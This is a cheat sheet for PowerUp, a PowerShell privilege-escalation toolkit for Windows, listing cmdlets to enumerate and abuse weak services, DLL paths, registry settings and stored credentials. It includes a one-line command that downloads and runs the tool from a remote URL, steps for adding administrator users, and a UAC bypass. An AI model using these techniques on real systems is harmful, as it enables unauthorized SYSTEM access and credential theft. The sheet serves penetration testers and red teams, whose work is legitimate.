PowerUp provides tools for abusing Windows services and escalating privileges. It includes commands to install malicious binaries as services, add privileged users, hijack DLL paths, and more. The cheat sheet describes various registry and system checks along with helpers for tasks like enabling privileges and bypassing UAC. It also outlines techniques for weaponizing writable service paths and the Windows PATH variable through DLL hijacking.
PowerUp Cheat Sheet

Getting Started

Note: PowerUp's 'bleeding edge' will always be in the development branch of PowerSploit.

Get PowerUp: http://bit.ly/1PdjSHk

Load from disk: 1) C:\> powershell -exec bypass 2) PS C:\> Import-Module PowerUp.ps1

Load from GitHub: PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")

Load in Cobalt Strike's Beacon: beacon> powershell-import /local/path/to/PowerUp.ps1, then beacon> powershell Invoke-AllChecks

Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] [-full]

Most PowerUp functions are implemented in Empire in privesc/powerup/*

Invoke-PrivescAudit (old Invoke-AllChecks) will run all current privilege escalation checks detailed in this guide and will output the appropriate abuse function syntax for anything found. The -HTMLReport flag will write out an HTML version of the report to SYSTEM.username.html.

Enumerating Service Vulnerabilities

Get-ModifiableService: Enumerates all services where the current user can modify the service binPath.

Get-ModifiableServiceFile: Enumerates all services where the current user can write to the associated service binary or its arguments.

Get-ServiceUnquoted: Enumerates all services w/ unquoted binary paths.

Weaponizing Service Vulnerabilities

Invoke-ServiceAbuse abuses a vulnerable service's binPath to execute commands as SYSTEM. Install-ServiceBinary installs a malicious C# binary for a specified service. Both cmdlets accept the following parameters (as well as accepting service names/service objects from Get-Service on the pipeline):

-Name SERVICE: Service name to abuse.

-UserName '[DOMAIN\]USER': The username to add (defaults to 'john'). Domain users are not created, only added to the LocalGroup.

-Password: The password for the added user (defaults to 'P@55Word' and 'Password123!').

-LocalGroup "NAME": The group to add the user to (default: 'Administrators').

-Command "net…": Custom command to execute.

Install-ServiceBinary backs up the original service path to \orig_path.exe.bak. Restore-ServiceBinary will restore this backup binary to its original path.

Set-ServiceBinPath can set a service's binPath without calling sc.exe.

DLL Hijacking Helpers

Find-PathDLLHijack checks if the current %PATH% has any directories that are writeable by the current user. Weaponizable for Windows 7 with Write-HijackDll and 'FOLDER\PATH\wlbsctrl.dll'.

Write-HijackDll writes out a self-deleting .bat file to \hijackpath\debug.bat that executes a command, and writes out a hijackable DLL that launches the .bat. It accepts the same -UserName/-Password/-Command arguments as Invoke-ServiceAbuse as well as:

-DllPath PATH\wlbsctrl.dll: Path to write the hijack DLL.

-Architecture [x64/x86]: Manual arch specification.

-BatPath PATH\y.bat: Path of the .bat for the hijackable .dll to run.

Registry Checks

Get-RegistryAlwaysInstallElevated: Checks if the "AlwaysInstallElevated" key is set. This means that MSI installation packages always run as SYSTEM.

Get-RegistryAutoLogon: Returns any autologon credentials from various registry locations.

Get-ModifiableRegistryAutoRun: Returns autoruns where the current user can modify the binary/script (or its config).

Miscellaneous Checks

Get-UnattendedInstallFile: Checks for leftover unattend.xml files.

Get-Webconfig: Recovers cleartext and encrypted connection strings from all web.configs. Credit to Scott Sutherland.

Get-ProcessTokenPrivilege: Returns all privileges for the current (or specified) process.

Get-SiteListPassword: Searches for any McAfee SiteList.xml files and decrypts the contents.

Enable-Privilege: Enables a specific privilege for the current process. Available privileges can be found with Get-ProcessTokenPrivilege.

Get-CurrentUserTokenGroupSid: Returns all SIDs that the current user is a part of, even if the SID is disabled.

Invoke-EventVwrBypass: Bypasses UAC by performing an image hijack on the .msc file extension.

More Information

http://www.harmj0y.net/blog/
Version 1.2. Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.